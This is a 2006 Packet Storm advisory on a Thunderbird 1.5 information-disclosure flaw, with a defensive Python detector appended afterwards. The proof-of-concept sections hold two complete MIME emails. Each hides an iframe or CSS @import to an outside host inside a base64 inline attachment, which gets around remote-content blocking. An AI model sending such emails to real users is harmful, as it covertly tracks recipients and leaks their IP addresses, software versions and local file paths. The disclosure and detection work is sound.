
moz-15.txt

02 Mar 2006 | Reported by crashfr | Type: packetstorm | Source: packetstormsecurity.com

Mozilla Thunderbird Vulnerability in HTML Rendering Engine

Code
`Mozilla Thunderbird : Multiple Information Disclosure Vulnerabilities  
  
  
//----- Advisory  
  
  
Program : Mozilla Thunderbird  
Homepage : http://www.mozilla.com/thunderbird/  
Tested version : 1.5  
Found by : crashfr at sysdream dot com  
This advisory : crashfr at sysdream dot com  
Discovery date : 2006/02/18  
  
  
//----- Application description  
  
  
Full-Featured Email  
  
Simple to use, powerful, and customizable, Thunderbird is a full-featured  
email application. Thunderbird supports IMAP and POP mail protocols, as well  
as HTML mail formatting. Easily import your existing email accounts and  
messages. Built-in RSS capabilities, powerful quick search, spell check as you  
type, global inbox, deleting attachments and advanced message filtering round  
out Thunderbird's modern feature set.  
  
  
//----- Description of vulnerability  
  
  
Thunderbird's HTML rendering engine insufficiently filters the loading  
of external resources from inline HTML attachments. External files are  
downloaded even if the "Block loading of remote images in mail messages"  
option is enabled.  
  
  
//----- Proof Of Concept  
  
  
* Iframe Exploit :  
  
  
Subject: Thunploit by CrashFr !  
From: CrashFr<[email protected]>  
To: CrashFr<[email protected]>  
Content-Type: multipart/related; type="multipart/alternative";  
boundary="----=_NextPart_000_0000_DE61E470.78F38016"  
  
This is a multi-part message in MIME format.  
  
------=_NextPart_000_0000_DE61E470.78F38016  
Content-Type: multipart/alternative;  
boundary="----=_NextPart_001_0001_06199DF9.5C825A99"  
  
------=_NextPart_001_0001_06199DF9.5C825A99  
Content-Type: text/plain; charset="iso-8859-1"  
Content-Transfer-Encoding: 7bit  
  
Test by CrashFr  
  
------=_NextPart_001_0001_06199DF9.5C825A99  
Content-Type: text/html; charset="iso-8859-1"  
Content-Transfer-Encoding: 7bit  
<html><head>  
</head><body style="margin: 0px; padding: 0px; border: 0px;">  
<iframe src="cid:[email protected]" width="100%"  
height="100%" frameborder="0" marginheight="0" marginwidth="0"></iframe>  
</body></html>  
  
------=_NextPart_001_0001_06199DF9.5C825A99--  
  
------=_NextPart_000_0000_DE61E470.78F38016  
Content-Type: text/html; name="basic.html"  
Content-Transfer-Encoding: base64  
Content-ID: <[email protected]>  
  
PGh0bWw+PGhlYWQ+PC9oZWFkPjxib2R5IHN0eWxlPSJtYXJnaW46IDBweDsgcGFkZGluZzogMHB4  
OyBib3JkZXI6IDBweDsiPjxpZnJhbWUgc3JjPSJodHRwOi8vd3d3LnN5c2RyZWFtLmNvbSIgd2lk  
dGg9IjEwMCUiIGhlaWdodD0iMTAwJSIgZnJhbWVib3JkZXI9IjAiIG1hcmdpbmhlaWdodD0iMCIg  
bWFyZ2lud2lkdGg9IjAiPjwvaWZyYW1lPg==  
  
------=_NextPart_000_0000_DE61E470.78F38016--  
  
  
* CSS Exploit :  
  
  
Subject: Thunploit by CrashFr !  
From: CrashFr<[email protected]>  
To: CrashFr<[email protected]>  
Content-Type: multipart/related; type="multipart/alternative";  
boundary="----=_NextPart_000_0000_DE61E470.78F38016"  
  
This is a multi-part message in MIME format.  
  
------=_NextPart_000_0000_DE61E470.78F38016  
Content-Type: multipart/alternative;  
boundary="----=_NextPart_001_0001_06199DF9.5C825A99"  
  
------=_NextPart_001_0001_06199DF9.5C825A99  
Content-Type: text/plain; charset="iso-8859-1"  
Content-Transfer-Encoding: 7bit  
  
Test by CrashFr  
  
------=_NextPart_001_0001_06199DF9.5C825A99  
Content-Type: text/html; charset="iso-8859-1"  
Content-Transfer-Encoding: 7bit  
<html><head>  
<link rel="stylesheet" type="text/css"  
href="cid:[email protected]" /></head><body>  
</body></html>  
  
------=_NextPart_001_0001_06199DF9.5C825A99--  
  
------=_NextPart_000_0000_DE61E470.78F38016  
Content-Type: text/css; name="basic.css"  
Content-Transfer-Encoding: base64  
Content-ID: <[email protected]>  
  
QGltcG9ydCB1cmwoaHR0cDovL3d3dy5zeXNkcmVhbS5jb20vdGVzdC5jc3MpOwpib2R5IHsgYmFj  
a2dyb3VuZC1jb2xvcjogI0NDQ0NDQzsgfQ==  
  
------=_NextPart_000_0000_DE61E470.78F38016--  
  
  
  
//----- Impact  
  
  
Successful exploitation may lead to information disclosure (user agent:  
application version & platform, IP address...). A spammer can easily  
check if an email is read. Moreover, an HTML reply to those types of  
emails will contain the complete URL path to the mailbox  
(i.e. mailbox:///C%7C/Documents%20and%20Settings/CrashFr/  
Application%20Data/Thunderbird/Profiles/7jko3in9.default/  
Mail/Local%20Folders/Inbox?number=2194930&header=quotebody&part=1.2&filename=basic.css).  
  
  
//----- Solution  
  
  
No known solution. You have to wait for a vendor upgrade.  
  
  
//----- Credits  
  
  
http://www.sysdream.com  
crashfr at sysdream dot com  
  
  
//----- Greetings  
  
  
nono2357 & the hackademy ...  
  
  
`
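
A mail-gateway style check for the pattern the advisory describes, added here as an example and not part of the original advisory: it follows `cid:` references from HTML parts to inline `text/html` or `text/css` parts, decodes them, and lists the `http(s)` URLs they would fetch. The function names, the sample message and the `example.invalid` hosts are constructed for illustration.

```python
import base64
import re
from email import message_from_string, policy

# cid: references in an HTML part, and remote URLs inside HTML or CSS text.
CID_REF = re.compile(r"""(?:src|href)\s*=\s*["']?cid:([^"'\s>]+)""", re.I)
REMOTE_URL = re.compile(r"""(?:(?:src|href)\s*=\s*["']?|url\(\s*["']?|@import\s+["'])"""
                        r"""(https?://[^"'\s>);]+)""", re.I)
ACTIVE_TYPES = {"text/html", "text/css"}


def indirect_remote_loads(raw_message):
    """Return (content_id, type, url) for remote URLs in cid:-referenced parts."""
    msg = message_from_string(raw_message, policy=policy.default)
    by_cid, referenced = {}, set()
    for part in msg.walk():
        ctype = part.get_content_type()
        if ctype not in ACTIVE_TYPES:
            continue
        text = part.get_content()  # undoes base64 / quoted-printable
        cid = part.get("Content-ID")
        if cid:
            by_cid[str(cid).strip().strip("<>")] = (ctype, text)
        if ctype == "text/html":
            referenced.update(CID_REF.findall(text))
    return [(cid, by_cid[cid][0], url)
            for cid in sorted(referenced & by_cid.keys())
            for url in REMOTE_URL.findall(by_cid[cid][1])]


def _inline(ctype, cid, body):  # builds one constructed base64 inline part
    encoded = base64.encodebytes(body.encode()).decode()
    return (f"--bnd\nContent-Type: {ctype}\nContent-Transfer-Encoding: base64\n"
            f"Content-ID: <{cid}>\n\n{encoded}")


# Constructed message: the body references two inline parts; a third is unused.
SAMPLE = (
    'MIME-Version: 1.0\nContent-Type: multipart/related; boundary="bnd"\n\n'
    "--bnd\nContent-Type: text/html\n\n"
    '<link rel="stylesheet" href="cid:css1@example.invalid">'
    '<iframe src="cid:frame1@example.invalid"></iframe>\n'
    + _inline("text/css", "css1@example.invalid",
              "@import url(http://tracker.example.invalid/t.css);")
    + _inline("text/html", "frame1@example.invalid",
              '<iframe src="http://tracker.example.invalid/page"></iframe>')
    + _inline("text/css", "unused@example.invalid",
              "@import url(http://tracker.example.invalid/never.css);")
    + "--bnd--\n")
```

Calling `indirect_remote_loads(SAMPLE)` reports the stylesheet and the iframe part but not the unreferenced one; a non-empty result marks a message whose remote fetch is hidden one level behind an inline attachment.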
